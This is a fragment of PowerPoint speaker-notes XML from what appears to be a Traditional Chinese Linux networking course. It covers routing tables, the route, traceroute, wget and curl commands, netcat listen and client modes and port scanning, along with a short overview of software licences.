              <a:t>(169.254.0.0/16 Class B) →</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>預設路由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(0.0.0.0/0.0.0.0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68861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關於授權的部分</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Open Source(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>開放原始碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代表授權為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>PGL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>BSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>GPL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Stallman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1984</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>年創立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>計畫與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>FSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>基金會發展版權宣言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自由軟體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Close Source-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>僅推出可執行的二進位程式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Freeware-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>免費軟體非自由軟體，不見得會公布原始碼，也有可能藏有惡意程式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Shareware-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>共享軟體為具使用限制的軟體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6246174"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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以下方為例，若有要傳封包到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Google DNS(8.8.8.8)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，主機怎麼判斷路由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>確認是否為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>192.168.1.0/24 → (2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>確認是否為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>169.254.0.0/16 →(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>都不是則使用預設路由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0/0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>192.168.1.254</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>出去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7492969"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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 smtClean="0"/>
              <a:t>增加 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(add) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與刪除 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(del) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>路由的相關參數：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：表示後面接的路由為一個網域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Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>表示後面接的為連接到單部主機的路由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 smtClean="0"/>
              <a:t>：與網域有關，可以設定 </a:t>
            </a:r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 smtClean="0"/>
              <a:t>決定網域的大小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gw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的簡寫，後續接的是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的數值喔，與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>dev </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不同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dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：如果只是要指定由那一塊網路卡連線出去，則使用這個設定，後面接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>eth0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等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0492993"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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 smtClean="0"/>
              <a:t>增加 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(add) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與刪除 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(del) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>路由的相關參數：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：表示後面接的路由為一個網域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Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>表示後面接的為連接到單部主機的路由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 smtClean="0"/>
              <a:t>：與網域有關，可以設定 </a:t>
            </a:r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 smtClean="0"/>
              <a:t>決定網域的大小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gw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的簡寫，後續接的是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的數值喔，與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>dev </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不同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dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：如果只是要指定由那一塊網路卡連線出去，則使用這個設定，後面接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>eth0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等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7926955"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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路由的新增與刪除範例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4189517"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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raceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 兩主機間各節點分析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選項與參數：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n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：進行主機名稱解析，單純用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，速度較快！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port:33434</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>進行偵測</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>預設偵測協定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-I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的方式來進行偵測；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>來進行偵測，一般使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port:80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>測試</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：若對方主機在幾秒鐘內沒有回聲就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>by pass.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>預設</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>秒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-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>埠號：若不使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>TC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>預設埠號來偵測，可在此改變埠號。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-g </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>路由：與 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的參數相仿，只是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>後面接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>gateway IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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02539981"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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從本地端到目地中間共經過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>個節點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4486168"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 網路檔案路徑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> [options] [URL..]</a:t>
            </a:r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–o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指定檔名  網路檔案路徑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[URL]  [URL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多檔案下載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–c  [URL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傳中途斷線檔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–ftp-user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  --ftp-password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>user_password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–mirror –p –convert-links –P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本地目錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[URL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砍站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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5964762"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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http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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 網路路徑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> curl [options] [URL..]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>瀏覽網頁測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服務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 [URL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瀏覽網頁測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服務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瀏覽需要身分驗證的網頁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–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–-user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>username:password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> [URL]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>帶入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值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–cookie “name=jack” [URL]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偽冒瀏覽器瀏覽網頁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–user-agent “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Mozila</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/5.0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>compatible;MSIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 5.01;windows NT5.0)” [URL]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0966055"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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Server &amp;&amp;Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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l [Local IP] port  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本機轉監聽模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>;Server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –l localhost 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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 [IP] port  (Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>模式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err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  [IP]  8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>類似，連接本地端的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port 25 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查閱相關訊息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8258061"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掃描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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[options] [URL..]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-v:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>顯示掃描訊息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l:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指定監聽外來的連線</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>進行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>server mode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-p :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>監聽</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[root@www ~]# nc –v –l -p localhost 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-z:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只有掃描，不進行資料傳輸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n:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不進行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查詢</a:t>
            </a:r>
